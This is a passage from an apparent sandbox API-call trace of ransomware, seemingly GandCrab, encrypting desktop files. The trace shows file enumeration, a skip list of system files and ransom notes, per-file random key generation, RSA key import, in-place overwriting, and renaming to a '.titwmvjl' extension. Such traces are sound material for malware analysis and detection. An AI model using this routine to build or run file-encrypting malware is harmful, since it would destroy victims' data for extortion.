lpString2="CRAB-DECRYPT.html") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="ntldr") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="NTDETECT.COM") returned 1 [0089.390] lstrcmpiW (lpString1="YIZKTZac3L5eFR7x.avi", lpString2="Bootfont.bin") returned 1 [0089.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi") returned 50 [0089.390] lstrlenW (lpString=".avi") returned 4 [0089.390] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.390] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0089.390] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.390] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.390] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yizktzac3l5efr7x.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.391] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.391] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.392] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.392] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.393] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.393] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.394] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.394] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.394] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.394] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.394] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.395] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.396] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.396] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.396] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.396] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.396] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.396] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.398] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0089.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.398] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.398] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.398] GetLastError () returned 0x0 [0089.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.399] CryptDestroyKey (hKey=0x5036f8) returned 1 [0089.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.399] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.399] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.400] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0089.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.401] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.401] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.401] GetLastError () returned 0x0 [0089.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.401] CryptDestroyKey (hKey=0x5036f8) returned 1 [0089.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.401] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.402] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x183b9, lpOverlapped=0x0) returned 1 [0089.410] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe7c47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.410] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x183b9, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x183b9, lpOverlapped=0x0) returned 1 [0089.412] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.412] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.413] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.418] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.419] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.419] CloseHandle (hObject=0x2ac) returned 1 [0089.420] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yizktzac3l5efr7x.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\YIZKTZac3L5eFR7x.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yizktzac3l5efr7x.avi.titwmvjl"), dwFlags=0x1) returned 1 [0089.421] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.421] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.421] lstrcmpW (lpString1="yu-0 63fuWb.bmp", lpString2=".") returned 1 [0089.421] lstrcmpW (lpString1="yu-0 63fuWb.bmp", lpString2="..") returned 1 [0089.422] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="yu-0 63fuWb.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp" [0089.422] lstrlenW (lpString=".titwmvjl") returned 9 [0089.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned 45 [0089.422] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.422] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp.titwmvjl") returned 54 [0089.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned 45 [0089.422] lstrlenW (lpString=".bmp") returned 4 [0089.422] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.424] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0089.424] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0089.424] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned 45 [0089.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned 45 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="desktop.ini") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="autorun.inf") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="ntuser.dat") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="iconcache.db") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="bootsect.bak") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="boot.ini") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="ntuser.dat.log") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="thumbs.db") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="ntldr") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="NTDETECT.COM") returned 1 [0089.424] lstrcmpiW (lpString1="yu-0 63fuWb.bmp", lpString2="Bootfont.bin") returned 1 [0089.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp") returned 45 [0089.425] lstrlenW (lpString=".bmp") returned 4 [0089.425] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.425] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0089.425] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.425] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.425] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yu-0 63fuwb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.427] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.427] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.428] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.428] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.429] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.430] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.430] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.430] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.430] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.430] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.430] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.431] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.432] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.432] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.432] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.432] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.432] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.432] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.437] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037b8) returned 1 [0089.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.438] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.438] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.438] GetLastError () returned 0x0 [0089.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.439] CryptDestroyKey (hKey=0x5037b8) returned 1 [0089.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.439] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.439] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.441] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0089.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.441] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.441] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.442] GetLastError () returned 0x0 [0089.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.442] CryptDestroyKey (hKey=0x503638) returned 1 [0089.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.442] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.442] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.442] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.443] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xbaff, lpOverlapped=0x0) returned 1 [0089.450] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff4501, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.450] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbaff, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xbaff, lpOverlapped=0x0) returned 1 [0089.451] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.451] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.452] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.456] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.456] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.456] CloseHandle (hObject=0x2ac) returned 1 [0089.457] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yu-0 63fuwb.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\yu-0 63fuWb.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\yu-0 63fuwb.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0089.458] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.458] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.458] lstrcmpW (lpString1="Z_MqB_.ods", lpString2=".") returned 1 [0089.458] lstrcmpW (lpString1="Z_MqB_.ods", lpString2="..") returned 1 [0089.458] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="Z_MqB_.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods" [0089.458] lstrlenW (lpString=".titwmvjl") returned 9 [0089.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned 40 [0089.458] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.458] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods.titwmvjl") returned 49 [0089.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned 40 [0089.458] lstrlenW (lpString=".ods") returned 4 [0089.458] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.458] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ods ") returned 5 [0089.458] lstrcmpiW (lpString1=".ods", lpString2=".titwmvjl") returned -1 [0089.458] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned 40 [0089.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned 40 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="desktop.ini") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="autorun.inf") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="ntuser.dat") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="iconcache.db") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="bootsect.bak") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="boot.ini") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="ntuser.dat.log") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="thumbs.db") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="KRAB-DECRYPT.html") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="CRAB-DECRYPT.html") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="ntldr") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="NTDETECT.COM") returned 1 [0089.459] lstrcmpiW (lpString1="Z_MqB_.ods", lpString2="Bootfont.bin") returned 1 [0089.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods") returned 40 [0089.459] lstrlenW (lpString=".ods") returned 4 [0089.459] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.459] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ods ") returned 5 [0089.459] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.459] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.459] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Z_MqB_.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\z_mqb_.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.460] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.460] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.460] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.461] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.462] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.462] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.462] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.462] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.462] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.462] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.463] CryptAcquireContextW (in: phProv=0x259f3a0, 